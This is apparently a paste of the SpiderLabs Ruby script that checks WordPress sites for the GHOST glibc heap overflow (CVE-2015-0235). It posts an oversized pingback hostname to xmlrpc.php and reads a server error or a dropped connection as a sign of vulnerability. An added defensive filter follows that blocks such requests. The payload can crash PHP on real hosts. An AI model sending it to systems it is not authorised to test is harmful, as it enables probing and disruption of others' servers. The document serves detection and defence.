Googleinurl

GHOST gethostbyname() Vuln (CVE-2015-0235)

Mar 15th, 2015
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
# Checks whether a WordPress site's xmlrpc.php hands an oversized pingback
# hostname to a glibc gethostbyname() still affected by GHOST (CVE-2015-0235).
# A 500 response or a dropped connection (PHP crashed) is reported as vulnerable.
require "net/http"
require "uri"

if ARGV.count != 2
  puts "Usage: #{$0} [Target URL] [count]"
  exit 1
end

# Accept "host", "host/path" or "host/path/xmlrpc.php", with or without a
# scheme; the script appends /xmlrpc.php itself, so a trailing one is dropped.
target = ARGV[0].sub(%r{\Ahttps?://}, "").chomp("/xmlrpc.php")
domain, _, path = target.partition("/")
base_path = path.empty? ? "" : "/#{path.chomp("/")}"
uri = URI.parse("http://#{domain}")
ghost_host = "0" * ARGV[1].to_i   # all-digit hostname of the requested length

# Set up POST request
payload = <<_EOF_
<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value>
      <string>http://#{ghost_host}/index.php</string>
    </value></param>
    <param><value>
      <string>http://#{ghost_host}/index.php</string>
    </value></param>
  </params>
</methodCall>
_EOF_

begin
  Net::HTTP.start(uri.host, uri.port) do |http|
    response = http.post("#{base_path}/xmlrpc.php", payload)
    if response.code == "500"
      puts "Vulnerable"
    else
      puts "Looks like you're safe, for today"
    end
  end
rescue EOFError
  # The server closed the connection without sending a response
  puts "Vulnerable"
end
#source : https://gist.github.com/rcbarnett/7564bee9f81aba746e04
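A defender-side counterpart, added here and not part of the paste or the SpiderLabs script: a WAF-style filter that inspects a pingback.ping request body and refuses source URIs whose host exceeds DNS length limits or is not a syntactically valid hostname, so an oversized all-digit host never reaches gethostbyname(). The function names (`check_pingback_request`, `classify_host`, `pingback_params`), the constants and the two sample request bodies are constructed for this example.

```ruby
# Added example: input validation for WordPress XML-RPC pingback requests.
# Not the project's code; names and sample bodies below are constructed.
require "rexml/document"
require "uri"

MAX_HOST_LENGTH = 253   # RFC 1035 limit for a fully qualified domain name
# One DNS label: 1-63 chars, alphanumeric plus inner hyphens.
LABEL_RE = /\A[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\z/i

# Returns the <string> params of a pingback.ping call, or nil when the
# body is well-formed XML but not a pingback.ping request (or not XML).
def pingback_params(xml_body)
  doc = REXML::Document.new(xml_body)
  name = REXML::XPath.first(doc, "/methodCall/methodName")&.text&.strip
  return nil unless name == "pingback.ping"
  REXML::XPath.match(doc, "/methodCall/params/param/value/string").map { |n| n.text.to_s.strip }
rescue REXML::ParseException
  nil
end

# Classifies one URI string: :ok, or a symbol naming why it is refused.
# The "0"*N host used by the checker above is refused as :host_too_long
# (N > 253) or :bad_label (label longer than 63) before any resolution.
def classify_host(uri_string)
  uri = URI.parse(uri_string)
  return :bad_scheme unless %w[http https].include?(uri.scheme)
  host = uri.host.to_s
  return :empty_host if host.empty?
  return :host_too_long if host.length > MAX_HOST_LENGTH
  return :bad_label unless host.split(".", -1).all? { |label| label.match?(LABEL_RE) }
  :ok
rescue URI::InvalidURIError
  :unparseable
end

# Verdict for a whole request body: [:allow] or [:block, reason, offending_uri].
def check_pingback_request(xml_body)
  params = pingback_params(xml_body)
  return [:allow] if params.nil?   # not a pingback; other rules decide
  return [:block, :wrong_arity, nil] unless params.length == 2
  params.each do |u|
    verdict = classify_host(u)
    return [:block, verdict, u] unless verdict == :ok
  end
  [:allow]
end

# Constructed sample bodies: one shaped like the GHOST probe, one benign.
GHOST_PROBE = <<XML
<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://#{"0" * 4000}/index.php</string></value></param>
    <param><value><string>http://#{"0" * 4000}/index.php</string></value></param>
  </params>
</methodCall>
XML

BENIGN_PING = <<XML
<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://blog.example.com/2015/01/post/</string></value></param>
    <param><value><string>http://www.example.com/2015/01/other-post/</string></value></param>
  </params>
</methodCall>
XML

if __FILE__ == $0
  p check_pingback_request(GHOST_PROBE)[0, 2]   # [:block, :host_too_long]
  p check_pingback_request(BENIGN_PING)         # [:allow]
end
```

The length and label checks alone are enough to stop the GHOST trigger, which needs a hostname well over 1 KB; a dotted-quad IPv4 literal still passes because each octet is a valid label. IPv6 literals in brackets are refused as `:bad_label` by this version and would need their own branch if a site expects them.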